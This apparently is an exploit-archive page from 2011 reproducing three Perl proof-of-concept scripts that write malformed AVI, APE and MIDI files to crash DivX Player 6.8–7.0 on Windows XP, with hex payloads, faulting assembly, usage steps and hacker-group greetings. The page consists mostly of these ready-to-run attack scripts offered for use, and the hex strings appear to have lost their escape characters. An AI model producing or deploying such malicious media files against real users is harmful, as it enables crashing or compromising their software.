Home / exploits DivX Player 7.0 Buffer Overflow
Posted on 27 March 2011
================================ #!/usr/bin/perl ### # Title : DivX Player v7.0 (.avi) Buffer Overflow # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : Windows # Impact : Overflow in 'DivX Player.exe' Process # Tested on : Windows XP SP3 Français # Target : DivX Player v6.8 & 6.9 & 7.0 ### # Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) # ------------ # Usage : 1 - Creat AVI file (14 bytes) # => 2 - Open AVI file With DivX Player # => 3 - OverFlow & Crshed !!! # ------------ # Homologue Bug in MP_Classic: (http://exploit-db.com/exploits/11535) || By : cr4wl3r # ------------ # Assembly Error in [quartz.dll] ! 74872224() ! : # 0x74872221 ,0x83 0xd2 0x00 || [adc] edx,0 # 0x74872224 ,0xf7 0xf1 [div] || eax,acx << (" Error Here ") # 0x74872226 ,0x0f 0xa4 0xc2 0x10 [shld] || edx,eax,10h # ------------ #START SYSTEM /root@MSdos/ : system("title KedAns-Dz"); system("color 1e"); system("cls"); print " "; print " |============================================| "; print " |= [!] Name : DivX Player v6 & 7.0 AVI File =| "; print " |= [!] Exploit : Local Buffer Overflow =| "; print " |= [!] Author : KedAns-Dz =| "; print " |= [!] Mail: Ked-h(at)hotmail(dot)com =| "; print " |============================================| "; sleep(2); print " "; # Creating ... my $PoC = "x4Dx54x68x64x00x00x00x06x00x00x00x00x00x00"; # AVI Header open(file , ">", "Kedans.avi"); # Evil File AVI (14 bytes) 4.0 KB print file $PoC; print " [+] File successfully created! " or die print " [-] OpsS! File is Not Created !! "; close(file); # Thanks To : ' cr4wl3r ' From Indonesia & All Indonesia MusLim HacKers #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz # Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz # Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com) # Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ # Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX # Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , # www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com # www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ... #================================================================================================ ================================ #!/usr/bin/perl ### # Title : DivX Player v7.0 (.ape) Buffer Overflow # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : Windows # Impact : Overflow in 'DivX Player.exe' Process # Tested on : Windows XP SP3 Français # Target : DivX Player v6.8 & 6.9 & 7.0 ### # Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) # ------------ # Usage : 1 - Creat APE file ( Monkey's Audio Format ) # => 2 - Open APE file With DivX Player # => 3 - OverFlow !!! # Assembly Error in [MonkeySource.ax] ! 0f4151a6() ! : # 0x0f4151a3 ,0xc2 0x80 0x00 [ret] || 8 # 0x0f4151a6 ,0xf7 0xf3 [div] || eax,abx << (" Error Here ") # 0x0f4151a8 ,0x31 0xd2 [xor] || edx,edx # 0x0f4151aa ,0xeb 0xf3 [jmp] || 0x0f41519f # 0x0f4151ac ,0xc3 [ret] || # ------------ #START SYSTEM /root@MSdos/ : system("title KedAns-Dz"); system("color 1e"); system("cls"); print " "; print " |===========================================================| "; print " |= [!] Name : DivX Player v6 & 7.0 || Monkey's Audio File =| "; print " |= [!] Exploit : Buffer Overflow Exploit =| "; print " |= [!] Author : KedAns-Dz =| "; print " |= [!] Mail: Ked-h(at)hotmail(dot)com =| "; print " |===========================================================| "; sleep(2); print " "; # Creating ... my $PoC = "x4Dx41x43x20x96x0fx00x00x34x00x00x00x18x00x00x00"; # APE Header open(file , ">", "Kedans.ape"); # Evil File APE (16 bytes) 4.0 KB print file $PoC; print " [+] File successfully created! " or die print " [-] OpsS! File is Not Created !! "; close(file); #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz # Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz # Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com) # Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ # Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX # Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , # www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com # www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ... #================================================================================================ ================================ #!/usr/bin/perl ### # Title : DivX Player v7.0 (.mid) Buffer Overflow # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : Windows # Impact : Overflow in 'DivX Player.exe' Process # Tested on : Windows XP SP3 Français # Target : DivX Player v6.8 & 6.9 & 7.0 ### # Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) # ------------ # Usage : 1 - Creat MID file # => 2 - Open MID file With DivX Player # => 3 - OverFlow !!! # ------------ # Homologue Bug in MP_Classic: (http://exploit-db.com/exploits/9620) || By : PLATEN # ------------ # Assembly Error in [quartz.dll] ! 74872224() ! : # 0x74872221 ,0x83 0xd2 0x00 || [adc] edx,0 # 0x74872224 ,0xf7 0xf1 [div] || eax,acx << (" Error Here ") # 0x74872226 ,0x0f 0xa4 0xc2 0x10 [shld] || edx,eax,10h # ------------ #START SYSTEM /root@MSdos/ : system("title KedAns-Dz"); system("color 1e"); system("cls"); print " "; print " |===========================================| "; print " |= [!] Name : DivX Player v6 & 7.0 (.mid) =| "; print " |= [!] Exploit : Buffer Overflow Exploit =| "; print " |= [!] Author : KedAns-Dz =| "; print " |= [!] Mail: Ked-h(at)hotmail(dot)com =| "; print " |===========================================| "; sleep(2); print " "; # Creating ... my $PoC = # MID Header "x4dx54x68x64x00x00x00x06x00x01x00x01x00x60x4dx54". "x72x6bx00x00x00x4ex00xffx03x08x34x31x33x61x34x61". "x35x30x00x91x41x60x01x3ax60x01x4ax60x01x50x60x7d". "x81x41x01x01x3ax5fx8dxe4xa0x01x50x01x3dx91x41x60". "x81x00x81x41x40x00x91x3ax60x81x00x76x6fxccx3dxa6". "xc2x48xeex8excaxc2x57x00x91x50x60x81x00x81x50x40". "x00xffx2fx00"; open(file , ">", "Kedans.mid"); # Evil File MID (100 bytes) 4.0 KB print file $PoC; print " [+] File successfully created! " or die print " [-] OpsS! File is Not Created !! "; close(file); # Thanks To : ' PLATEN ' & All Iranian MusLim HacKers #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz # Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz # Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com) # Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ # Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX # Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , # www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com # www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ... #================================================================================================
